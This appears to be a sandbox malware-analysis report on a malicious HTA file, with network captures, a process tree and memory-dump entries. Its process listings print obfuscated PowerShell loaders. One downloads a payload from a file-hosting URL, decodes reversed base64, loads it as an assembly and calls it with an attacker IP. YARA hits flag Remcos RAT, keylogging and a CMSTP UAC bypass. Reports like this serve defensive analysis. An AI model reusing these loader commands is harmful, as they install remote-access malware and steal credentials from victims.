Data Ascii: )41yr@K(ca;W+0d3JYx86ICbG5@M_=c}b 4u0&e#C>BTzr;Z]8fl:_KGGTFmhsJt-C,TI"\`-Ze 5m=zUmhY{mpR$"V?\yPnYVB$e\fUC0k:[rX*p&#~HR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 55664 | 94.245.104.56 | 443 | 6952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-18 15:53:38 UTC | 428 | OUT | GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
Host: api.edgeoffer.microsoft.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-18 15:53:39 UTC | 584 | IN | HTTP/1.1 200 OK
Content-Length: 0
Connection: close
Content-Type: application/x-protobuf; charset=utf-8
Date: Mon, 18 Nov 2024 15:53:38 GMT
Server: Microsoft-IIS/10.0
Set-Cookie: ARRAffinity=0b51276b42764abb6a267ed9848a33fb1623ecf1a727257141c3c00adc2ec6dd;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
Set-Cookie: ARRAffinitySameSite=0b51276b42764abb6a267ed9848a33fb1623ecf1a727257141c3c00adc2ec6dd;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
X-Powered-By: ASP.NET


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.855677172.217.16.1934436952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-18 15:53:42 UTC  594                OUT        GET /crx/blobs/AW50ZFuKxXfmS97pgdN117JdnzteDOW0nOxXPbIMSOJi_zMXlj_Y84pRZgGX1_WSw7i6yKhrqpdS319KewJbpE_4ZxBd62lsUferdiEuq7Yg9JR92C5gtrLldrMl4JgnY0IAxlKa5RR9kAwB758lMbnQOIDqR06lx1aH/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1
                                                       Host: clients2.googleusercontent.com
                                                       Connection: keep-alive
                                                       Sec-Fetch-Site: none
                                                       Sec-Fetch-Mode: no-cors
                                                       Sec-Fetch-Dest: empty
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                       Accept-Encoding: gzip, deflate, br
                                                       Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-18 15:53:42 UTC  566                IN         HTTP/1.1 200 OK
                                                       Accept-Ranges: bytes
                                                       Content-Length: 135771
                                                       X-GUploader-UploadID: AFiumC4aLkN4vLfx9Ko-Kyn2_Aqimi4nXxGXfYQ7A9BuUNzlci1gEIyelbKyXlYP7WA06kvj9xQ
                                                       X-Goog-Hash: crc32c=5YFIVw==
                                                       Server: UploadServer
                                                       Date: Sun, 17 Nov 2024 17:35:54 GMT
                                                       Expires: Mon, 17 Nov 2025 17:35:54 GMT
                                                       Cache-Control: public, max-age=31536000
                                                       Age: 80268
                                                       Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT
                                                       ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d
                                                       Content-Type: application/x-chrome-extension
                                                       Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                       Connection: close



Target ID: 0
Start time: 10:52:13
Start date: 18/11/2024
Path: C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit): true
Commandline: mshta.exe "C:\Users\user\Desktop\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta"
Imagebase: 0x330000
File size: 13'312 bytes
MD5 hash: 06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 1
Start time: 10:52:14
Start date: 18/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))"
Imagebase: 0x890000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 10:52:14
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID:3
Start time:10:52:15
Start date:18/11/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
Imagebase:0x890000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:10:52:20
Start date:18/11/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"
Imagebase:0x8f0000
File size:2'141'552 bytes
MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:10:52:21
Start date:18/11/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP"
Imagebase:0xbe0000
File size:46'832 bytes
MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:7
Start time:10:52:26
Start date:18/11/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
Imagebase:0x230000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:10:52:27
Start date:18/11/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:0x890000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:10:52:28
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:10
Start time:10:52:28
Start date:18/11/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
Imagebase:0x890000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:12
Start time:10:52:58
Start date:18/11/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:0xaa0000
File size:108'664 bytes
MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:10:53:23
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                                                                                                                                                                                                                                Imagebase:0x80000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                                                                                                                                                                                                                                Imagebase:0x6d0000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo"
                                                                                                                                                                                                                                Imagebase:0xe80000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x320000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x290000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x100000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 10:53:25
Start date: 18/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
Imagebase: 0x6d0000
File size: 108'664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 10:53:32
Start date: 18/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase: 0x7ff7f97c0000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 10:53:32
Start date: 18/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 27
Start time: 10:53:33
Start date: 18/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1972,i,17397243976134850236,17257031585275351317,262144 /prefetch:3
Imagebase: 0x7ff7f97c0000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 10:53:33
Start date: 18/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase: 0x7ff7f97c0000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 10:53:35
Start date: 18/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:3
Imagebase: 0x7ff7f97c0000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 10:53:41
Start date: 18/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6784 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
Imagebase: 0x7ff7f97c0000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 10:53:41
Start date: 18/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6888 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
Imagebase: 0x7ff7f97c0000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true
Memory Dump Source
• Source File: 00000000.00000003.1433522810.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
• Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
• Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
• Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000003.1433522810.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
Memory Dump Source
• Source File: 00000001.00000002.1587663694.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3100000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40eea56132ea319d468738030b1b44c1ec5a4d0c8f9101a9c8303bbb09c26065
• Instruction ID: 51dbd0e65728f3f1d3717ee662b5069070a51d6af44ae6a421bd831896b88b4a
• Opcode Fuzzy Hash: 40eea56132ea319d468738030b1b44c1ec5a4d0c8f9101a9c8303bbb09c26065
• Instruction Fuzzy Hash: 35223774A012199FDB04CF99D884A9EFBB2FF88310F248159E915AB395CB75ED81CF90
Strings
Memory Dump Source
• Source File: 00000001.00000002.1602018712.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_77c0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84i$84i$84i$84i$84i$84i
• API String ID: 0-3608691829
• Opcode ID: a949c017a47256782a1f60f2472d02b9f7659e073db4f9fe94af54fd479b2ad5
• Instruction ID: 2847b5848c63952c0a9d0c89b0982650061b116688fd478ad5d36bb5e9d92c28
• Opcode Fuzzy Hash: a949c017a47256782a1f60f2472d02b9f7659e073db4f9fe94af54fd479b2ad5
• Instruction Fuzzy Hash: F8F135B4B00209AFDB14DF68C810B6ABBA2EFC9750F65846DE906AF381DB71DD41C791
Strings
Memory Dump Source
• Source File: 00000001.00000002.1602018712.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_77c0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84i$84i$84i
• API String ID: 0-1595485978
• Opcode ID: 968e0f389b8e94a38aa81b1fcc037b6f55e508298d1526d32c98f30f6950710f
• Instruction ID: ddc060f2c6006eb001d965fa4bdd50909ffea3783017f6c8cdc4b4b5ad498133
• Opcode Fuzzy Hash: 968e0f389b8e94a38aa81b1fcc037b6f55e508298d1526d32c98f30f6950710f
• Instruction Fuzzy Hash: F891D1F4B00209EBCB14DF58C550B69B7F2AF88750F69846DE906AB382DB71ED41CB91
Strings
Memory Dump Source
• Source File: 00000001.00000002.1602018712.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
Joe Sandbox IDA Plugin
